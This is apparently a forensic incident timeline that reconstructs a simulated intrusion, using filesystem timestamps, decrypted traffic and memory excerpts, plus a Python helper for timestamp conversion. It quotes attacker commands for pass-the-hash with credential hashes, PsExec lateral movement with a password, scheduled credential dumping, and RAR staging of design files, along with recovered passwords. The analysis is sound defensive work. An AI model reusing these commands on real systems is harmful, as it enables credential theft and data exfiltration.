2012-11-27 00:10:44 - ENG-USTXHOU-148 - wc.exe is also in prefetch
Tue Nov 27 2012 00:10:44 13208 mac. r/rrwxrwxrwx 0 0 11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
Decrypted PCAP - wc.exe is used to change the current logon session's credentials to the sysbackup user; given the earlier psexec failures (trying to run ipconfig on other hosts), the attacker is trying to escalate privileges to see if this will work
C:\WINDOWS\webui>
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (000003E7h) to:
Username: sysbackup
domain: current
LMHash: c2a3915df2ec79ee73108eb48073acb7
NTHash: e7a6f270f1ba562a90e2c133a95d2057
NTLM credentials successfully changed!
2012-11-27 00:13:59 - ENG-USTXHOU-148 - ps is in prefetch
Tue Nov 27 2012 00:13:59 12542 mac. r/rrwxrwxrwx 0 0 11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf
Decrypted PCAP - now trying psexec as sysbackup; this can also be found in memory, as listed below
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10...
ENG-USTXHOU-148 (IN MEMORY) - ps command, running ipconfig on 172.16.223.47
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
2012-11-27 00:17:58 - FLD-SARIYADH-43 - 6to4ex.dll shows up on the filesystem, along with SYMANTEC-1.43-1[2] being in prefetch
Tue Nov 27 2012 00:17:58 100895 .ac. r/rr-xr-xr-x 0 0 12010-128-4 c:/WINDOWS/system32/6to4ex.dll
22270 macb r/rrwxrwxrwx 0 0 12011-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-330FB7E3.pf
2012-11-27 00:17:58 - FLD-SARIYADH-43 - webui directory is born
Tue Nov 27 2012 00:18:31 56 ...b d/drwxrwxrwx 0 0 7555-144-5 c:/WINDOWS/webui
2012-11-27 00:20:06 - FLD-SARIYADH-43 - ps is created on disk
Tue Nov 27 2012 00:20:06 381816 macb r/rrwxrwxrwx 0 0 12000-128-3 c:/WINDOWS/ps.exe
2012-11-27 00:20:33 - FLD-SARIYADH-43 - gs.exe is created on disk
Tue Nov 27 2012 00:20:33 303104 macb r/rrwxrwxrwx 0 0 12005-128-3 c:/WINDOWS/webui/gs.exe
2012-11-27 00:20:33 - IIS-SARIYADH-03 - gs.exe is modified (gsecdump as recovered from pcap)
Tue Nov 27 2012 00:20:33 303104 m... r/rrwxrwxrwx 0 0 10365-128-3 c:/WINDOWS/webui/gs.exe
2012-11-27 00:20:36 - FLD-SARIYADH-43 - ps is in the webui directory
Tue Nov 27 2012 00:20:36 381816 ...b r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
2012-11-27 00:20:37 - FLD-SARIYADH-43 - formal creation timestamp is placed
Tue Nov 27 2012 00:20:37 381816 m.c. r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
2012-11-27 00:20:39 - FLD-SARIYADH-43 - ra.exe is in the webui directory
Tue Nov 27 2012 00:20:39 403968 ...b r/rrwxrwxrwx 0 0 12013-128-3 c:/WINDOWS/webui/ra.exe
2012-11-27 00:20:40 - FLD-SARIYADH-43 - ra.exe gets its creation timestamp
Tue Nov 27 2012 00:20:40 403968 mac. r/rrwxrwxrwx 0 0 12013-128-3 c:/WINDOWS/webui/ra.exe
2012-11-27 00:20:40 - IIS-SARIYADH-03 - ra.exe is modified (rar.exe)
Tue Nov 27 2012 00:20:40 403968 m... r/rrwxrwxrwx 0 0 10380-128-3 c:/WINDOWS/webui/ra.exe
2012-11-27 00:20:42 - FLD-SARIYADH-43 - sl.exe is written to disk
Tue Nov 27 2012 00:20:42 20480 macb r/rrwxrwxrwx 0 0 12014-128-3 c:/WINDOWS/webui/sl.exe
2012-11-27 00:20:46 - FLD-SARIYADH-43 - wc.exe is created
Tue Nov 27 2012 00:20:46 208384 m.cb r/rrwxrwxrwx 0 0 12015-128-3 c:/WINDOWS/webui/wc.exe
208384 m... r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
2012-11-27 00:20:46 - IIS-SARIYADH-03 - wc.exe is modified (wce)
Tue Nov 27 2012 00:20:46 208384 m... r/rrwxrwxrwx 0 0 10881-128-3 c:/WINDOWS/webui/wc.exe
2012-11-27 00:21:12 - FLD-SARIYADH-43 - netuse.dll is born and ipconfig is used
Tue Nov 27 2012 00:21:12 10454 ...b r/rrwxrwxrwx 0 0 12016-128-3 c:/WINDOWS/webui/netuse.dll
55808 .a.. r/rrwxrwxrwx 0 0 24195-128-3 c:/WINDOWS/system32/ipconfig.exe
2012-11-27 00:21:13 - FLD-SARIYADH-43 - prefetch grabs ipconfig
Tue Nov 27 2012 00:21:13 26332 macb r/rrwxrwxrwx 0 0 12017-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
FLD-SARIYADH-43 - ipconfig is run and echoed back to the console
1727908-Windows IP Configuration
1727909- Host Name . . . . . . . . . . . . : fld-sariyadh-43
1727910- Primary Dns Suffix . . . . . . . : petro-market.org
1727911- Node Type . . . . . . . . . . . . : Hybrid
1727912- IP Routing Enabled. . . . . . . . : No
1727913- WINS Proxy Enabled. . . . . . . . : No
1727914- DNS Suffix Search List. . . . . . : petro-market.org
1727915-Ethernet adapter Local Area Connection:
1727916- Connection-specific DNS Suffix . :
1727917- Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
1727918- Physical Address. . . . . . . . . : 00-0C-29-A7-7C-6E
1727919- Dhcp Enabled. . . . . . . . . . . : No
1727920- IP Address. . . . . . . . . . . . : 172.16.223.187
1727921- Subnet Mask . . . . . . . . . . . : 255.255.255.0
1727922- Default Gateway . . . . . . . . . : 172.16.223.8
1727923- DNS Servers . . . . . . . . . . . : 172.16.150.10
1727924- Primary WINS Server . . . . . . . : 172.16.223.47
2012-11-27 00:21:26 - FLD-SARIYADH-43 - net is used
Tue Nov 27 2012 00:21:26 14550 ...b r/rrwxrwxrwx 0 0 12018-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
FLD-SARIYADH-43 - net view command
1727925-Server Name Remark
1727926--------------------------------------------------------------------------------
1727927-\\DC-USTXHOU
1727928-\\ENG-USTXHOU-148
1727929-\\FLD-SARIYADH-43
1727930-\\IIS-SARIYADH-03
1727931:The command completed successfully.
FLD-SARIYADH-43 - net group command
1727932-Alias name administrators
1727933-Comment Administrators have complete and unrestricted access to the computer/domain
1727934-Members
1727935--------------------------------------------------------------------------------
1727936-Administrator
1727937-Amir
1727938-PETRO-MARKET\amirs
1727939-PETRO-MARKET\Domain Admins
1727940-sysbackup
2012-11-27 00:21:41 - FLD-SARIYADH-43 - net is used
Tue Nov 27 2012 00:21:41 14116 ...b r/rrwxrwxrwx 0 0 12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
FLD-SARIYADH-43 - net start output
1727949-These Windows services are started:
1727950- Application Layer Gateway Service
1727951- Automatic Updates
1727952- COM+ Event System
...snip
1727984- Terminal Services
1727985- Themes
1727986- WebClient
1727987- Windows Audio
1727988- Windows Firewall/Internet Connection Sharing (ICS)
1727989- Windows Management Instrumentation
1727990- Windows Time
1727991- Wireless Zero Configuration
1727992- Workstation
1727993:The command completed successfully.
2012-11-27 00:23:09 - FLD-SARIYADH-43 - sl.exe is used and put in prefetch
Tue Nov 27 2012 00:23:09 6768 macb r/rrwxrwxrwx 0 0 12020-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
FLD-SARIYADH-43 - Result of a scanning tool
1727994-Scan of 254 IPs started at Tue Nov 27 03:22:59 2012
1727995--------------------------------------------------------------------------------
1727996-172.16.223.8
1727997-Responded in 0 ms.
1727998-0 hops away
1727999-Responds with ICMP unreachable: No
1728000-TCP ports: 21 80
1728001-TCP 21:
1728002-[220 (vsFTPd 2.3.0)]
1728003-TCP 80:
1728004-[HTTP/1.1
200 OK Date: Tue, 27 Nov 2012 00:23:08 GMT Server: Apache/2.2.16
(Ubuntu) Last-Modified: Fri, 23 Nov 2012 15:06:45 GMT ETag:
"2194f-b1-4cf2aee9810d2]
1728005--------------------------------------------------------------------------------
1728006-172.16.223.47
1728007-Responded in 0 ms.
1728008-0 hops away
1728009-Responds with ICMP unreachable: No
1728010-TCP ports: 80 445
1728011-TCP 80:
1728012-[HTTP/1.1 200 OK Content-Length: 1433 Content-Type: text/html Content-Location: http://172.16
2012-11-27 00:23:35 - FLD-SARIYADH-43 - the creation timestamp is finally placed on netuse.dll, gs.exe is put into prefetch, and samsrv.dll as well as SECURITY.LOG and wc.exe are all touched at this time (sounds like password dumping to me!)
Tue Nov 27 2012 00:23:35 10454 mac. r/rrwxrwxrwx 0 0 12016-128-3 c:/WINDOWS/webui/netuse.dll
9990 macb r/rrwxrwxrwx 0 0 12021-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
415744 .a.. r/rrwxrwxrwx 0 0 23442-128-3 c:/WINDOWS/system32/samsrv.dll
33280 .a.. r/rrwxrwxrwx 0 0 24393-128-3 c:/WINDOWS/system32/cryptdll.dll
Tue Nov 27 2012 00:23:40 1024 mac. r/rr-xr-xr-x 0 0 3342-128-3 c:/WINDOWS/system32/config/SECURITY.LOG
Tue Nov 27 2012 00:24:18 13084 ...b r/rrwxrwxrwx 0 0 12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
2012-11-27 01:26:47 - ENG-USTXHOU-148 - system5.bat is created
Tue Nov 27 2012 01:26:47 88 macb r/rrwxrwxrwx 0 0 11738-128-1 c:/WINDOWS/webui/system5.bat
ENG-USTXHOU-148 - Contents of the .bat file
@echo off
copy c:\windows\webui\wc.exe c:\windows\system32
at 19:30 wc.exe -e -o h.out
2012-11-27 00:27:21 - FLD-SARIYADH-43 - ps is used and put in prefetch
Tue Nov 27 2012 00:27:21 10330 ...b r/rrwxrwxrwx 0 0 12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf
2012-11-27 00:31:39 - FLD-SARIYADH-43 - system1.bat is written
Tue Nov 27 2012 00:31:39 91 ...b r/rrwxrwxrwx 0 0 12024-128-4 c:/WINDOWS/system1.bat
Tue Nov 27 2012 00:43:34 91 mac. r/rrwxrwxrwx 0 0 12024-128-4 c:/WINDOWS/system1.bat
2012-11-27 00:43:46 - FLD-SARIYADH-43 - system6.bat is written
Tue Nov 27 2012 00:43:45 184 macb r/rrwxrwxrwx 0 0 12026-128-1 c:/WINDOWS/system6.bat
2012-11-27 00:43:46 - IIS-SARIYADH-03 - system.dll is copied
Tue Nov 27 2012 00:44:16 5711 ...b r/rrwxrwxrwx 0 0 10872-128-3 c:/WINDOWS/webui/system.dll
Tue Nov 27 2012 00:44:16 5711 mac. r/rrwxrwxrwx 0 0 10872-128-3 c:/WINDOWS/webui/system.dll
Decrypted PCAP - system.dll is copied to IIS-SARIYADH-03
copy z:\system.dll .
copy z:\system.dll .
1 file(s) copied.
C:\WINDOWS\webui>
2012-11-27 00:53:49 - IIS-SARIYADH-03 - several files created.
Tue Nov 27 2012 00:53:49 303104 ..cb r/rrwxrwxrwx 0 0 10365-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 00:55:41 1230 ...b r/rrwxrwxrwx 0 0 10780-128-3 c:/WINDOWS/webui/svchost.dll
Tue Nov 27 2012 00:56:43 303104 .a.. r/rrwxrwxrwx 0 0 10365-128-3 c:/WINDOWS/webui/gs.exe
1230 m.c. r/rrwxrwxrwx 0 0 10780-128-3 c:/WINDOWS/webui/svchost.dll
Decrypted PCAP - Information gathering on IIS-SARIYADH-03
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 06:49 PM <DIR> .
11/26/2012 06:49 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
6 File(s) 953,491 bytes
2 Dir(s) 7,004,934,144 bytes free
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
Z 15351 13079 NTFS Network Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984447946948861
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
...snip...
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
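The WRITE TIME column above is a raw Windows FILETIME. As an added example (not part of the original write-up), the following Python converts those values to UTC and cross-checks them against the mactime timeline and the attacker's dir output; it assumes the timeline stamps are in UTC.

```python
# Added example (not part of the original write-up): convert the raw FILETIME
# values in the C2 'WRITE TIME' column to UTC and cross-check them against the
# mactime timeline and the attacker's 'dir' output. Sample values are copied
# from the listings above; the mactime timeline is assumed to be in UTC.
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed from the 'LIST FILES (C:\WINDOWS\webui\)' block above.
WEBUI_LISTING = """\
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
"""


def filetime_to_utc(ft: int) -> datetime:
    """Integer arithmetic keeps the sub-second part exact (ticks // 10 = microseconds)."""
    return _FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_file_list(text: str) -> dict:
    """Parse a 'TOKEN: FILE LIST' block into {name: (size, write_time_utc)}.
    Names may contain spaces, so size and time are taken from the end of the line."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "DIR":
            continue  # header or blank line
        name = " ".join(parts[1:-2])
        entries[name] = (int(parts[-2]), filetime_to_utc(int(parts[-1])))
    return entries


def matches_timeline(entries: dict, name: str, mactime: str, tolerance_s: int = 2) -> bool:
    """True if the C2 listing's write time agrees with a mactime stamp such as
    'Tue Nov 27 2012 00:44:16'. A copied file keeps its modification time, so a
    mismatch against the entry's birth (b) time is expected, not suspicious."""
    mft = datetime.strptime(mactime, "%a %b %d %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return abs((entries[name][1] - mft).total_seconds()) <= tolerance_s


def local_offset_hours(write_utc: datetime, dir_stamp: str) -> float:
    """Infer the host's UTC offset from the 'dir' timestamp (local, minute precision)
    shown for the same file, e.g. '11/26/2012 05:06 PM' for gs.exe."""
    local = datetime.strptime(dir_stamp, "%m/%d/%Y %I:%M %p")
    utc_naive = write_utc.replace(tzinfo=None, second=0, microsecond=0)
    return round((local - utc_naive).total_seconds() / 1800) / 2  # nearest half hour


if __name__ == "__main__":
    files = parse_file_list(WEBUI_LISTING)
    for name, (size, when) in files.items():
        print(f"{name:12} {size:>7} {when:%Y-%m-%d %H:%M:%S} UTC")
    print("system.dll matches MFT:", matches_timeline(files, "system.dll", "Tue Nov 27 2012 00:44:16"))
    print("host UTC offset:", local_offset_hours(files["gs.exe"][1], "11/26/2012 05:06 PM"))
```

system.dll lands on the mactime stamp to the second, while gs.exe's write time (23:06:48 UTC) predates its 00:53:49 birth on IIS-SARIYADH-03 because the copy preserved the source file's modification time.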
2012-11-27 00:53:29 - FLD-SARIYADH-43 - system2.bat is written
Tue Nov 27 2012 00:53:29 69 ...b r/rrwxrwxrwx 0 0 12027-128-3 c:/WINDOWS/webui/system2.bat
Tue Nov 27 2012 00:56:18 69 mac. r/rrwxrwxrwx 0 0 12027-128-3 c:/WINDOWS/webui/system2.bat
Decrypted PCAP - svchost.dll copied to IIS-SARIYADH-03
COMMAND: DOWN FILES (C:\WINDOWS\webui\system.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\system.dll: 5711)
COMMAND: CONTINUE
TOKEN: FILE DATA (5711)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
copy z:\svchost.dll .
copy z:\svchost.dll .
1 file(s) copied.
C:\WINDOWS\webui>
2012-11-27 00:55:41 - IIS-SARIYADH-03 - system.dll is copied
Tue Nov 27 2012 00:55:41 1230 ...b r/rrwxrwxrwx 0 0 10780-128-3 c:/WINDOWS/webui/svchost.dll
Decrypted PCAP - Information gathering on IIS-SARIYADH-03
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
DIR bootstat.dat 2048 129984410109687500
DIR clock.avi 82944 126750960000000000
DIR cmsetacl.log 373 129981622463220165
DIR Coffee Bean.bmp 17062 126750960000000000
...snip...
DIR Web 0 129981606114042698
DIR webui 0 129984509415736823
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\svchost.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\svchost.dll: 1230)
COMMAND: CONTINUE
TOKEN: FILE DATA (1230)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
2012-11-27 00:59:00 - FLD-SARIYADH-43 - system3.bat is written
Tue Nov 27 2012 00:59:00 56 macb r/rrwxrwxrwx 0 0 12028-128-1 c:/WINDOWS/webui/system3.bat
Decrypted PCAP - https.dll copied to IIS-SARIYADH-03
copy z:\https.dll .
copy z:\https.dll .
1 file(s) copied.
C:\WINDOWS\webui>
2012-11-27 01:00:34 - IIS-SARIYADH-03 - https.dll is copied
Tue Nov 27 2012 01:00:34 5282 mac. r/rrwxrwxrwx 0 0 10875-128-3 c:/WINDOWS/webui/https.dll
2012-11-27 01:04:59 - FLD-SARIYADH-43 - system4.bat is written
Tue Nov 27 2012 01:04:59 131 ...b r/rrwxrwxrwx 0 0 12029-128-3 c:/WINDOWS/webui/system4.bat
Tue Nov 27 2012 01:11:00 131 mac. r/rrwxrwxrwx 0 0 12029-128-3 c:/WINDOWS/webui/system4.bat
2012-11-27 01:05:24 - IIS-SARIYADH-03 - WinRAR created.
Tue Nov 27 2012 01:05:24 403968 ..cb r/rrwxrwxrwx 0 0 10380-128-3 c:/WINDOWS/webui/ra.exe
Tue Nov 27 2012 01:05:55 48 macb d/drwxrwxrwx 0 0 10877-144-1 c:/Documents and Settings/sysbackup/Application Data/WinRAR
2012-11-27 01:11:00 - IIS-SARIYADH-03 - system4.bat copied to the system
Tue Nov 27 2012 01:11:00 131 m.c. r/rrwxrwxrwx 0 0 10876-128-1 c:/WINDOWS/system32/system4.bat
IIS-SARIYADH-03 - Rar bat file found in memory
@echo off
c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll
2012-11-27 01:11:19 - IIS-SARIYADH-03 - WinRAR accessed and pump files rar’d.
Tue Nov 27 2012 01:11:19 403968 .a.. r/rrwxrwxrwx 0 0 10380-128-3 c:/WINDOWS/webui/ra.exe
2048000 .a.. r/rrwxrwxrwx 0 0 10672-128-3 c:/Engineering/Designs/Pumps/pump1.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10681-128-3 c:/Engineering/Designs/Pumps/pump10.dwg
131 .a.b r/rrwxrwxrwx 0 0 10876-128-1 c:/WINDOWS/system32/system4.bat
109092 ...b r/rrwxrwxrwx 0 0 10878-128-3 c:/WINDOWS/webui/netstat.dll
Tue Nov 27 2012 01:11:20 2048000 .a.. r/rrwxrwxrwx 0 0 10667-128-3 c:/Engineering/Designs/Pumps/pump100.dwg
...snip...
Tue Nov 27 2012 01:11:39 2048000 .a.. r/rrwxrwxrwx 0 0 10763-128-3 c:/Engineering/Designs/Pumps/pump94.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10764-128-3 c:/Engineering/Designs/Pumps/pump95.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10765-128-3 c:/Engineering/Designs/Pumps/pump96.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10766-128-3 c:/Engineering/Designs/Pumps/pump97.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10767-128-3 c:/Engineering/Designs/Pumps/pump98.dwg
Tue Nov 27 2012 01:11:40 2048000 .a.. r/rrwxrwxrwx 0 0 10768-128-3 c:/Engineering/Designs/Pumps/pump99.dwg
109092 mac. r/rrwxrwxrwx 0 0 10878-128-3 c:/WINDOWS/webui/netstat.dll
2012-11-27 01:21:18 - FLD-SARIYADH-43 - wc.exe is accessed and at.exe is put in prefetch, indicating that a scheduled job is being set up
Tue Nov 27 2012 01:21:18 208384 .a.. r/rrwxrwxrwx 0 0 12015-128-3 c:/WINDOWS/webui/wc.exe
208384 ...b r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
322 ...b r/rrwxrwxrwx 0 0 12032-128-1 c:/WINDOWS/Tasks/At1.job
12960 ...b r/rrwxrwxrwx 0 0 12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
25088 .a.. r/rrwxrwxrwx 0 0 24481-128-3 c:/WINDOWS/system32/at.exe
FLD-SARIYADH-43 - wce output in memory
1537035-v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
1537036-Use -h for help.
1537037-amirs\PETRO-MARKET:!Yy128*Z
1537038-NETWORK SERVICE\PETRO-MARKET:bcauG
0O;&N!WVAeOJG8^/+IY<\C*>WNH[*ciP"9d"F4a\Bo\:6:j7Bt25%'X>B/y(AR8,O,`qZKDlKuBJnwMzX8Ome'^gjOw)nN?YXU>Qo(U3(#bfOZRS%I
1537039-FLD-SARIYADH-43$\PETRO-MARKET:bcauG
0O;&N!WVAeOJG8^/+IY<\C*>WNH[*ciP"9d"F4a\Bo\:6:j7Bt25%'X>B/y(AR8,O,`qZKDlKuBJnwMzX8Ome'^gjOw)nN?YXU>Qo(U3(#bfOZRS%I
1537040-C:\WINDOWS\webui>
2012-11-27 01:19:41 - FLD-SARIYADH-43 - system5.bat is written
Tue Nov 27 2012 01:19:41 88 ...b r/rrwxrwxrwx 0 0 12030-128-3 c:/WINDOWS/webui/system5.bat
FLD-SARIYADH-43 - psexec system5.bat to 172.16.223.47 (IIS-SARIYADH-03)
1854481-Connecting to 172.16.223.47...
1854482-Starting PsExec service on 172.16.223.47...
1854483-Connecting with PsExec service on 172.16.223.47...
1854484-Copying system5.bat to 172.16.223.47...
1854485-Error copying system5.bat to remote system:
1854486-C:\WINDOWS\webui>
2012-11-27 01:21:07 - IIS-SARIYADH-03 - system5.bat created.
Tue Nov 27 2012 01:21:07 88 m.c. r/rrwxrwxrwx 0 0 10879-128-1 c:/WINDOWS/system32/system5.bat
IIS-SARIYADH-03 - system5.bat found in memory.
system5.bat
@echo off
copy c:\windows\webui\wc.exe c:\windows\system32
at 04:30 wc.exe -e -o h.out
FLD-SARIYADH-43 - Running the dir command on the webui directory.
Volume in drive C has no label.
Volume Serial Number is F87B-5AD8
Directory of C:\WINDOWS\webui
11/27/2012 04:19 AM <DIR> .
11/27/2012 04:19 AM <DIR> ..
11/27/2012 03:20 AM 303,104 gs.exe
11/27/2012 03:23 AM 10,454 netuse.dll
11/27/2012 03:20 AM 381,816 ps.exe
11/27/2012 03:20 AM 403,968 ra.exe
11/27/2012 03:20 AM 20,480 sl.exe
11/27/2012 03:56 AM 69 system2.bat
11/27/2012 03:59 AM 56 system3.bat
11/27/2012 04:11 AM 131 system4.bat
11/27/2012 04:19 AM 88 system5.bat
11/27/2012 03:20 AM 208,384 wc.exe
10 File(s) 1,328,550 bytes
2 Dir(s) 6,992,097,280 bytes free
2012-11-27 01:21:19 - FLD-SARIYADH-43 - Tasks folder is touched (usually residue from a task operating)
Tue Nov 27 2012 01:21:19 344 .a.. d/drwxrwxrwx 0 0 5458-144-1 c:/WINDOWS/Tasks
2012-11-27 01:22:07 - FLD-SARIYADH-43 - ps is accessed again
Tue Nov 27 2012 01:22:07 381816 .a.. r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
2012-11-27 01:22:08 - IIS-SARIYADH-03 - At1.job entry born
Tue Nov 27 2012 01:22:08 322 ...b r/rrwxrwxrwx 0 0 10880-128-1 c:/WINDOWS/Tasks/At1.job
Tue Nov 27 2012 01:23:23 13084 mac. r/rrwxrwxrwx 0 0 12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
48 mac. d/drwxrwxrwx 0 0 72-144-7 c:/WINDOWS/Temp
2012-11-27 01:24:20 - FLD-SARIYADH-43 - ps is also thrown into prefetch
Tue Nov 27 2012 01:24:20 10330 mac. r/rrwxrwxrwx 0 0 12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf
2012-11-27 01:27:31 - FLD-SARIYADH-43 - net commands are used (while we cannot tell which ones, the results of several commands are found in memory)
Tue Nov 27 2012 01:27:31 14116 mac. r/rrwxrwxrwx 0 0 12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
124928 .a.. r/rrwxrwxrwx 0 0 23983-128-3 c:/WINDOWS/system32/net1.exe
42496 .a.. r/rrwxrwxrwx 0 0 23984-128-3 c:/WINDOWS/system32/net.exe
FLD-SARIYADH-43 - net share output
1727942-There are no entries in the list.
1727943-Share name Resource Remark
1727944--------------------------------------------------------------------------------
1727945-ADMIN$ C:\WINDOWS Remote Admin
1727946-C$ C:\ Default share
1727947-IPC$
2012-11-27 01:27:03 - ENG-USTXHOU-148 - AT1.job, wc, and at.exe are all touched, indicating that a scheduled task is being set up or running
Tue Nov 27 2012 01:27:03 208384 .a.. r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
208384 ...b r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
322 ...b r/rrwxrwxrwx 0 0 11740-128-1 c:/WINDOWS/Tasks/At1.job
12948 ...b r/rrwxrwxrwx 0 0 11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
